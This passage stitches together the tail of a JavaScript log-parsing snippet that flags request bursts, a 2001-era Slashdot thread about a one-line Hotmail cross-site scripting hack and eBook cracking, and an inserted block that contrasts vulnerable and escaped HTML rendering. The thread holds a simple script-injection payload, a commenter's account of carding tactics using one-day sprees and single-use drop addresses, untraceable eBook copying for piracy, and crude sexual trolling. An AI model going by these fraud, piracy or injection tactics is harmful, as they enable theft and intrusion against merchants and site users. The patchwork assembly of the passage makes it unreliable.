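  '2001-05-06 01:36:57 198.51.100.7 - 192.0.2.10 80 GET /default.htm - 200 Mozilla/4.0+(compatible)',
  '2001-05-06 01:36:57 198.51.100.7 - 192.0.2.10 80 GET /default.htm - 200 Mozilla/4.0+(compatible)',
  '2001-05-06 01:36:57 198.51.100.7 - 192.0.2.10 80 GET',
  '2001-05-06 02:10:00 203.0.113.5 - 192.0.2.10 80 GET /index.htm - 200 Mozilla/4.0+(compatible)',
].join('\n');

// Parse the log into one object per data row, keyed by the #Fields names.
// '-' means "no value" in this format and becomes null; rows shorter than the
// field list (truncated lines) are padded with null rather than dropped, so the
// client IP and timestamp survive for detection.
function parseW3CLog(text) {
  let fields = [];
  const entries = [];
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (line === '') continue;
    if (line.startsWith('#')) {
      // Directive lines; #Fields may appear more than once and redefine the layout.
      if (line.startsWith('#Fields:')) fields = line.slice('#Fields:'.length).trim().split(/\s+/);
      continue;
    }
    if (fields.length === 0) continue; // data before any #Fields directive: unparseable
    const cols = line.split(/\s+/);
    const entry = {};
    fields.forEach((name, i) => {
      const v = i < cols.length ? cols[i] : null;
      entry[name] = v === null || v === '-' ? null : v;
    });
    entry.timestamp = entry.date && entry.time ? Date.parse(`${entry.date}T${entry.time}Z`) : NaN;
    if (entry['sc-status'] !== null) entry['sc-status'] = Number(entry['sc-status']);
    entries.push(entry);
  }
  return entries;
}

// Report every client IP that made at least minRequests requests inside any
// windowSeconds-long interval. Uses a sliding window over each client's sorted
// timestamps, so it is linear in the number of requests per client.
function findBursts(entries, windowSeconds = 5, minRequests = 5) {
  const timesByIp = new Map();
  for (const e of entries) {
    if (!e['c-ip'] || Number.isNaN(e.timestamp)) continue;
    if (!timesByIp.has(e['c-ip'])) timesByIp.set(e['c-ip'], []);
    timesByIp.get(e['c-ip']).push(e.timestamp);
  }
  const bursts = [];
  for (const [ip, times] of timesByIp) {
    times.sort((a, b) => a - b);
    let best = 0, bestLo = 0, lo = 0;
    for (let hi = 0; hi < times.length; hi++) {
      while (times[hi] - times[lo] > windowSeconds * 1000) lo++;
      if (hi - lo + 1 > best) { best = hi - lo + 1; bestLo = lo; }
    }
    if (best >= minRequests) {
      bursts.push({
        ip,
        requests: best,
        from: new Date(times[bestLo]).toISOString(),
        to: new Date(times[bestLo + best - 1]).toISOString(),
      });
    }
  }
  return bursts;
}

if (typeof require !== 'undefined' && require.main === module) {
  const entries = parseW3CLog(SAMPLE_LOG);
  console.log(`${entries.length} entries parsed`);
  for (const b of findBursts(entries)) {
    console.log(`burst from ${b.ip}: ${b.requests} requests between ${b.from} and ${b.to}`);
  }
}
```

Thresholds are a tuning decision: a handful of requests in a few seconds is normal for a page with images, so in practice you would tune windowSeconds and minRequests against your own baseline and join the result with sc-status and cs-uri-stem before treating it as an incident.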
Why can't people use apostrophes correctly these days?
I don't understand exactly what this cross-site scripting is all about and how it can defeat firewalls etc., but does it really mean that all websites are even less secure than Hotmail??
This sig under construction. Please check back later.
- Say you've done it
- Try to do it
- Study feasibility of it
Note that steps 2 and 3 are optional.
rooooar
Your writeup was awful. And what loser submits a story TWICE? We decided your karma whoring was too lame even for us, so we dumped it.
Sincerely,
Slashteam
Interesting...and what crackhead moderator thought "Offtopic"? Honestly.
The actual "hack" then is the "smartness" to merge these two together, compile it, and run it. Whoever does that is the "cracker" who made a program that cracks eBooks, not the original two authors...
Could it work ? :)
B. Peers, login fuxored
If you want to get rid of those, you'll have to firewall them.
You don't firewall anyway?
- A.P.
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
Really. Slashdot has gotten more and more close minded. I can't respect this crap anymore.
Don't worry, you'll still get hits from me. I'm not going to post anymore except to spam.
Once the public in general trusts their personal data, credit card numbers etc to MSFT (including politicians), sooner or later they will feel betrayed by this company (when, not if, someone steals their data and misuses it).
This might just be what's necessary to once and for all turn public opinion against this evil empire.
ComponentSource has added support for Passport and is building in a new HailStorm notification service that will allow the Web site to inform its customers of new products through a variety of ways, including instant messages, said ComponentSource Chief Executive Sam Patterson.
Can you say "SPAM!"
He probably used perl. If you can't do something in one line of perl then it's probably not worth doing.
So sysadmins who can't be bothered to download the MS patch, will each be bothered to write security code for an entire operating system, and get it *right* ?
[lapis]~>wc -l reallyMeanCrack
40882 reallyMeanCrack
[lapis]~>cat reallyMeanCrack|tr '\n' ' ' > reallyMeanOneLinerCrack
Unable to read configuration file '/bigassraid/htdig//conf/14229.conf'
Geocrawler error message.
I find this comment in the CNET article amusing:
AOL Time Warner could not be reached for comment...
The whole of AOL can't be reached? Every member of its untold millions of employees happened to have their phone switched off that day I guess.
Actually IP filtering is built in. You just need to turn it on and configure it.
Or just "[boot name] single". Most distros don't bother to require a login at the single user runlevel. I can see how this can be a Good Thing (i.e., libcrypt is fux0red), but if that computer is in a public place, yer screwed.
--
#nohup cat
This brings up a good point about transferring data to humans: it's difficult to do without the data going all over the place. Through sound waves, light waves, radio...
Now if we could just get everyone to embed those neural connectors in their brains with built in decoding algs and a really private key... well until the nanobots... which infiltrate your blood stream and go to your brain to read the storage device... but oh no! it's not magnetic storage, it's a molecular computer, so they can't read it... not until they melt a small hole in it... but you have a newer self upgrading chip which has defenses... uhm nevermind.
Privacy is dead... deader than dead... privacy is in the TV... it's all in your head. --Marilyn Manson
"Life, loathe it or ignore it, you can't like it."
- Marvin, the Paranoid Android
I heard a year ago about a lecture which was held by one publisher company. When students asked the lecturer's opinion about eBooks, he just showed how to crack that *.lit format (and he just downloaded one tool from the Net). Then he bitched something about M$ quality...
I'm outside the US, and have no intention of ever visiting it as long as the DMCA remains in place.
If anybody would like to publish some code that violates the DMCA, forward it to me and I'll publish it immediately on a subdomain of tech-mad.org. No need to supply your identity or any other details.
Bzzzzzt..."AAAAaaaaarrrgh!!!" Thud.
I guess having code to decrypt the encrypted .LIT files would be useful if someone wants to give you a copy of their bought MS Reader E-Book. However, currently it is very easy (in Windows) to use software like Wintask to automate the copy and pasting of each page of the book into Notepad. It's quite a fun process - watch it automatically going through every page copying and pasting the entire book - takes about 3 mins. Then presto - you have it in TXT format, and the person who copied it isn't traceable. You can then read it in Linux or convert it to Gutenpalm format to read on your Palm - or give a copy to your friends or post it on alt.binaries.e-books. For a while I was looking into how to crack these .LIT files, but once I realised I could do the above, there was no longer any point.
Does anyone know how Hailstorm fits in with the UK's Data Protection Act legislation? Does MS become the owner of the data? If so it's up to them to take "reasonable measures" to guarantee the security of the information. If they fsck up, then - IANADPL - they could be in deep shit. Similarly, the physical location is important. Sending personal data outside of the EU without permission is against the DPA - that could happen just in a server replication.
Any DPA experts out there?
Is there similar legislation stateside?
This sig made only from recycled ASCII
I must have missed the boat on this one.
But why does the slashcode insert spaces into URLs etc., especially URLs that aren't even <A>-links?
Is it supposed to reduce goatse encounters or something?
i've posted approx. 10 times on /., but have never been modded above a 2. I often wonder what it feels like to have a +5, and I was all set to find out, but then I realized that the time it would take me to think of something deserving of a 5 wouldn't make it worthwhile. So instead, I'll post some insightful comments that won't be labelled that way.
- Linux is not more inherently stable than Windows. The fact is that Linux users are generally much more experienced using computers than the average Windows user and therefore can make his/her computer operate the way he/she wants to. It has very little to do with the operating system itself. Windows is also unstable thanks to applications that are idiot proof (they take over a good number of system resources, and if something unexpected happens, a crash happens or worse a chain crash). Experienced Windows users without idiot-proof software have systems that purr.
- In general, the Windows user is less experienced than a Linux user because Windows users tend to have a life. This means that at certain times they 1) shut off their computer without worrying about their uptime, 2) go outside, sometimes in direct sunlight 3) communicate with others in their species, including the female gender and maintain relationships with these people and 4) periodically engage in consensual sexual relations with others in their species. Linux users 1) brag about their uptime to anyone who will stand still long enough to listen on IRC 2) play Quake2 and harass other users over the network (and consequently get their ISP to suspend their account - read below) and 3) cap the night off by packeting their favorite irc server/irc user/website
- Not surprisingly, studies have indicated that people who run Linux are more likely to get their Internet connection suspended or terminated by their ISP. Admittedly, this is largely due to people on @home running illegal web servers, but not an insignificant amount is caused by harassment on IRC and other lame behavior. In other words, Linux == social retards.
- There have been rumors that I sucked Hemos' dick. Let me put these to rest right here - I did suck Hemos' dick but it was for 1 gram of weed. He said it would be 1g of shitty shwag, but I sucked dick so well that he gave me 1g of chron from his fat sack.
- I did have sex with your _____ (fill in mom or sister here, depending on which one(s) are alive and the level of hotness) and i busted in her, but now I have some sort of disease. So fuck your mom/sister/whatever.
Cut the binding with the filesharing on TCP/IP (in the Network card applet). And indeed you should be firewalling anyway, as "Wakko Warner" said.
Ahhh...the great dumpster continuum. Many a free computer will be found there. -- sowth (748135)
"God bless the U.S., where moving a book from your home to your office is a federal offence."
That's funny, I recall taking home an industry mag from my IT desk just yesterday. Oh wait, you want me to copy each page in a professional photo-copier, with pictures, rebind it, and include the copyright notice the original publisher placed at the bottom, so I can have an additional copy at home. That seems perfectly legit.
Please...
You didn't make an excellent point; indeed, the very fact that you suggest that you did is a further pointer to smugness.
The word "sic" means "thus", and does not necessarily suggest that the word for which it is being used has been misspelled, but that its original form has been retained.
What precisely are you calling "artistic license"?
And I'm posting as an AC because I'm not at my own PC, don't remember my password, and don't have access to it. And, of course, because I'm a karma whore like everyone else.
You ever heard of guerrilla warfare? Instead of random acts by script kiddies, we are seeing electronic warfare by nations and political groups. Now that the separation between corporate and business interests has disappeared, is a blow against corporate tyranny any different than blows against some government?
Freenet is the outback, the deep forest that hides the liberator/bandit.
Hmmm... The Science of Cracking.
Seriously, get one of these universities that go over the internet to make a department, then have them claim the DMCA interferes with science, their right to publish, and etc.
I would contribute $0.02 to it. (Oh, wait, I have.) Yes, this is a joke, if you can't tell.
I have a quantum crypto system available for making emails and efaxes unreadable by echelon. You could get the thought police out of your life easily, stand up to Big Brother!
email me if you want to be involved.
- Kaos games and encryption systems developer
Contains (somehow, not really sure how) the UNIX/Sadmind virus. At least our enterprise anti-virus software, Sophos Sweep detects that when I open the page. You guys might want to check out the links you supply with stories a little better. BTW, I still get the virus warning after the Veridian guys deleted the directory. Check it out at www.veridian.com/upload/ .
--- Think of it as evolution in action ---
Anyone? One has to wonder just WTF they do over there, no? This is starting to sound like the detox/rehab/wife beating world of family court. I mean there is what, a daily incident or problem where MS says - um yeah that's messed up too.
Name me another company that has this many security problems.
I hope he has the day off on Monday - someone should sponsor him and he could do this 5 times a week!
My Karma was at 49, then they switched to words. All that work for nothing!
Really? How many security holes have YOU discovered, written corrective code for, recompiled your kernel and submitted the fix?
I'm willing to bet exactly 0.
All this talk of "having" the source doesn't do the average computer user ONE BIT OF GOOD.
Good for you that you have the source. Most people are still waiting for the fix to show up on their update sites.
Talk about the speed at which patches are available, don't imply that every computer user is also willing to be a code-debugger.
When did microsoft ever sue anyone for finding a hole in the OS?
I find tons of articles, researches and legit businesses in the US where the sole purpose is to research, discover, patch and fix these risks.
On the other hand, if you break copyright laws it doesn't matter which OS you do it under, it is still "illegal".. not that I agree with the DMCA, but you're blinded by your beliefs in Linux as being a legal place to do illegal work
Try it.
The "source" is:
<script>
alert("This site has a cross-site scripting vulnerability!")
window.open("http://slashdot.org/")
</script>
You can be much more nasty with this, popping up goatse.cx or whatever. Basically, it's possible to do anything JavaScript allows you to do.
You are in a maze of twisty little relative jumps, all alike.
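The script above only runs because some page echoes untrusted input straight into its HTML. As an added example (not the poster's code), here is that reflection as a vulnerable page template next to a hardened one that encodes the input for the HTML text and quoted-attribute contexts; renderVulnerable, renderHardened and escapeHtml are hypothetical names for a handler that echoes a search term back to the user.

```javascript
// Reflected cross-site scripting: vulnerable rendering next to the hardened form.
// The payload is the one quoted in the post; everything else is constructed here.
const POSTED_PAYLOAD =
  '<script>alert("This site has a cross-site scripting vulnerability!")</script>';

// Vulnerable: the user-supplied term is concatenated straight into the markup,
// so a term containing tags becomes part of the page and the browser runs it.
function renderVulnerable(term) {
  return `<h1>Results for: ${term}</h1>\n<input name="q" value="${term}">`;
}

// Encode the five HTML metacharacters. This is the right encoding for the HTML
// text context and for values inside double-quoted attributes; it is NOT enough
// for JavaScript, CSS or URL contexts, which need their own encoders.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened: the same template, with the term encoded at the point of insertion.
// The browser now displays the angle brackets as text instead of parsing a tag.
function renderHardened(term) {
  const safe = escapeHtml(term);
  return `<h1>Results for: ${safe}</h1>\n<input name="q" value="${safe}">`;
}

// Crude demo check, not a real HTML parser: does the rendered markup still
// contain a script element the browser would execute?
function hasLiveScript(html) {
  return /<script\b/i.test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable:\n' + renderVulnerable(POSTED_PAYLOAD));
  console.log('hardened:\n' + renderHardened(POSTED_PAYLOAD));
  console.log('script survives in vulnerable render:', hasLiveScript(renderVulnerable(POSTED_PAYLOAD)));
  console.log('script survives in hardened render:', hasLiveScript(renderHardened(POSTED_PAYLOAD)));
}
```

The encoding is the page's responsibility, not the firewall's: the request and response are ordinary HTTP, which is why a packet filter sees nothing wrong.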
Any computer with a floppy disk or bootable CDRom is at risk.
(or even an ethernet bootable machine)
(or a machine on dhcp with anytype of nis/directory server authentication).
or...
STAC Electronics...IBM...Symantec...Apple Computer...Corel...need I go on...as long as you do the monkey dance and kiss Billy's ass and suborn the interests of your management and investors...in other words do it the "Microsoft way" you get support. Once you speak up, differ in approach or start to talk about a more equal share of the attention/PR/money/whatever, you're screwed...just ask the above companies...
Remember guys, this is Amerika. Just because you have the most votes, doesn't mean you get to win.--Fox Mulder
this guy should upload the code to freenet where, hopefully, it is impossible to remove the program or discover the author. This is the exact kind of thing freenet was designed for, so if the author is out there in slashland, go for it! Civil Disobedience ra ra ra!
No. The whole point of civil disobedience is that a law or regulation is openly defied in a very public manner, and the transgressors challenge the authorities to enforce the law. The belief is that should the larger public become aware of the law and the inappropriate punishment that comes from breaking it, the government will feel compelled to change the law. As well, if enough people are openly breaking this law, the system will get clogged up with trivialities.
Civil disobedience is not hiding in the shadows and skulking around under cover of anonymity.
And this gets a +5 insightful? WTF?
*** Where are we going? And what's with this handbasket?
That link really gets my goat. 2 years ago (actually even a bit before that) I often discussed this kind of "universal login" system with people. Initially just coworkers, but later on a couple people in the VC community. In *EVERY* case, less than 30 seconds into the discussion, the question of "But how does it make money?" came up. Without a snazzy one-liner back, it was sunk. No "advertising" because it's a behind the scenes thing. No "licensing" because it was based on open standards. Hmmm... Whaddya do? So my thoughts got placed on the back burner, MS gobbled up someone (who was it?) already in that space (moderately successful at that time, but they'd started in the days when PR was more important than revenue) and morphed that into passport. Argh...
A packet filter is better than nothing, but it is not the answer. One should not assume that because they are "protected" by a packet filter that they are secure.
IMHO, I think that it can be argued that a proxy firewall solution is the most secure. With a proxy, there is no direct connection between a host on the secure network and the internet. The downside of course is that proxy solutions are not transparent.
The next best alternative would be a firewall that does stateful inspection. That is transparent to the user, but is not a secure as a proxy-based one.
*** Where are we going? And what's with this handbasket?
Bill, I don't think that word means what you think it does.
We're talking about making your users safe from hackers, not making your company safe from its users.
Hehe, oh wait, I remember MANY here saying that a security problem was quote "an invitation to enter and take/put" OK, welcome to my house sir.... don't mind the fact that your head will soon be disappearing in a spray of CSF, blood and brain matter. Oh wait, you have more rights to rob, trespass and harm me in my OWN home than I have to defend myself thanks to the liberals, so don't be too surprised when you find out I happen to be able to kill you in a couple of seconds with an 'archaic' fighting skill
"On a path as clear as it is reliable"
...Certainly true: Zero equals zero.
"How many light bulbs does it take to change a person?" --BMcC-->
I agree with everything you said but I have a question about this:
Reason being is most of the security issues with M$ products stem from their desire to give users the so-called usability features that they scream for, usually at the expense of security.
Who asked for email attachments to launch automatically? Who asked for all processes to effectively run as root? Who asked IIS to install and run without the user being explicitly informed?
Who asked for any of these "features" on a desktop, much less a server?
I think the problem is that server and system administration is a non-trivial task, and m$ has tried to dumb-down administering an NT server to the point where anyone can do it.
Who needs to pay for a skilled, experienced SysAdmin when Joe from accounting can press the reset button whenever something goes wrong?
*** Where are we going? And what's with this handbasket?
IMHO, i think they *knew* what to do with it. they thought that their market position (and thus their power) translated into a general idea of acceptance of microsoft technology. they really thought they would be able to convince people that it was a good idea. i think they started questioning themselves with the latest barrage of criticisms (sp?) and the exposure of the security issues with MS technology.
they got carried away with a utopian view of the internet and the possibilities.
with the flack they're getting and with the sudden 'viability' of open-source (in the face of changing terms for MS licensing) they are uncertain about the 'bet-the-farm' strategy. they don't want to push it too far.
IOW, they are scared of pushing things too far.
But would people actually fall for it?
It is best to keep your lies plausible and as close to the truth as possible.
Hopefully by the time the European answer to DMCA gets passed it will be so watered down and have so many exceptions that they wont have to go through this same stupidity.
BELIEVE
THE
LIE
I am Spartacus
The virus in question recently infected one of our servers running the ever-so-crappy IIS 4.0, despite being patched with the most recent Service Pack from Microsoft, as well as the security update to prevent Code Red. Apparently, the SP isn't as cumulative as it should be.....
I would much rather be running Apache, but our CRM application requires IIS for its extranet capabilities.
This negligence from Microsoft should be addressed with a class action lawsuit.
The fact is there isn't much use for stolen credit card numbers. Now of course there is some use, but the bulk of things require the actual credit card. What are you gonna do, order something from ThinkGeek and have it delivered to your house? Make a couple long distance phone calls?
Wrong guess, -5. What you do with a stolen credit card number is mail-order expensive, easy-to-fence items from companies that are too clueless to notice that the credit card's billing address does not match the address of the drop site you have the stuff shipped to. Yes, such companies exist; yes, you can get a lot of valuables with very little risk if you only use the credit cards for a one day buying spree, and have the stuff shipped express to a drop address that you use once and don't go back to. After that, the credit card company's security department will notice something is wrong. Since the "victim" in credit card fraud is the merchant or credit card company, not the owner of the credit card, you are not in much danger of being charged even if someone figures out who you might be, since most merchants don't seem to pursue matters across state borders, but just eat the charge or the CC company eats the charge.
How do I know this? Someone got a hold of one of my credit card numbers early this year, and went on a mail-order buying spree with it. That's where I found out that I cannot press charges myself, as I am not the victim, officially. Go figure.
The thieves tried to order high-end cameras, professional audio equipment, pre-paid cell phones, boomboxes, and camping equipment. The pro audio business, the big department store, one of the big wireless companies, and the photo shop were clueful enough to call me for confirmation when the billing and shipping address did not match. They won; they didn't get defrauded. Unfortunately, the other big wireless company and the sports equipment catalog company were too stupid to bother; they lost. The sports equipment guys were really dumb; the fraudulent mail-order got sent out, returned with "no such address", and they sent it out again!
---dragoness
Unfortunately, I don't think most people would feel betrayed if their personal information was stolen from a Microsoft server, or any server. They would blame the hackers. The media profile of hackers is so high, and the profile of security experts is so low, that most people don't realise it's possible to secure your data against hackers, and they won't expect the system administrator to be held responsible if a hacker breaks into the system.
[Insert Your Favorite Redundant Anti-MS Propaganda Here]
Blog Prophyts - Right On, Man
This negligence from Microsoft should be addressed with a class action lawsuit.
...except for the fact that you already clicked the "Accept" button.
"...NO WARRANTIES. Microsoft expressly disclaims any warranty for the SOFTWARE PRODUCT. The SOFTWARE PRODUCT and any related documentation is provided "as is" without warranty of any kind, either express or implied, including, without limitation, the implied warranties of merchantability, fitness for a particular purpose, or noninfringement. The entire risk arising out of use or performance of the SOFTWARE PRODUCT remains with you."
Since when is an error page of type application/content-stream? It doesn't even display in my (Galeon) browser!
They just provided one-button mice and designed the interface accordingly.
Actually, this is not *quite* true. Macs do have two mouse buttons, the "other" mouse button is on the keyboard. In order to get context menu functionality, you press and hold the Control key and click the mouse button. It is functionally the same as a right click. In fact, my USB logitech mouse assigned the "Ctrl+click" to its right mouse button by default.
Since the Control key on my Mac has (to me) never been used for anything else, I have always considered it the "right mouse button."
If you don't want M$ to own internet identity management and authentication, you need to join the grassroots effort to support XNS (http://www.xns.org) now!
Ports 135,136,137,445:
Solution is to unbind the Microsoft client and server stuff from the network adapter. click click click, no firewall required. While you are there, unbind everything else that you do not want running on a 'public' interface.
(You could try killing the 'server' and 'workstation' service but Windows doesn't necessarily like that. There is also something you can do to make the RPC/SMB stuff safer - remove anon connections and require NTLM2, but it's still not solid.)
Q: Why does anyone bother with e-book encryption?
A: Profit
e-book encryption is not designed to stop dedicated "cracking" attempts. It's not even designed to slow it down. Think about it for a minute. These weak protections are there in conjunction with the DMCA to facilitate the licensingmuch cheaper to produce and distribute.
e-book encryption exists for the sole purpose of propping up an otherwise impossible business case. With physical media (i.e. a soft cover book) if I were to reproduce and distribute the books, I would not be able to sell them for less than the publisher, and still make any kind of a profit. The same is not true with el
"Most distros don't bother to require a login at the single user runlevel."
My Libranet Debian installation requires the root password once the system gets going, or you don't get access to the console shell.
The exploit that Jeremiah Grossman used to hack Hotmail in 1 line of code is cross-site scripting. Here is an interesting article by John Dvorak, about how it is IN Microsoft's interest to publicise the cross-site scripting vulnerability and try to scare internet users away from "promiscuous browsing".
www.whitehatsec.com
This is the site of the guy who quit yahoo a few months ago, started his own company, and found the problem. The print version of USA Today did mention this site and give kind of a rundown on how he did it in a separate article on page 2.
So, Hotmail was cracked in one line?
Easy to believe, if it was APL.
Mark
The clearance system sounds logical. It is not. It is completely arbitrary. -- John Bolton
You mean like Win2K Server and Win2K Professional?
Proof, if proof be needed, that Netscape engineers are weenies.
Of course the engineers at the companies working on this stuff know that their encryption will be hacked. They do it not to prevent hacking, but merely to make it less convenient.
What use is it to me if I put some data into Slashdot's log files? Can't I do that myself by just issuing the URL? Or am I missing something basic?
Yeah, Commodore invented the GUI, right. Those guys at Xerox must have copied it.
... stolen idea
... stolen idea
... stolen idea
... stolen idea
BTW,
Linux kernel
The basic GNU tools
X Windows
KDE interface
Need I go on?
It's not Redundant unless the moderators say it is.
I thought HTML scripting was safe... I mean, how can someone do something malicious with Javascript and all its limitations ?
Some nice gentleman from Taiwan hacked my Hotmail account about two months ago using the previous Hotmail hack, because yoyosoft just used a numeric counter in the parameters of the message in place of a real session id.
By chance I discovered that you can, with a bit of minor browser knowledge, tag mails to a Hotmail account and, at the very least, find out from where and when the tagged mail has been read. Great news for spammers. Because I am surely not the first one to use this doubleclick trick.
Umm, any computer at all is vulnerable. Remove the hard drive and plug it into another.
> Yeah, on a dual boot machine you can hax0r Linux in
> one line, by typing msdos at the LILO prompt.
You don't need a dual boot: just boot from a floppy or
from a rescue cdrom and do whatever you want with
root privileges.
Everybody can h4x0r a machine if {s}he has physical
access to it. Network security is totally useless if your
system is not physically secure.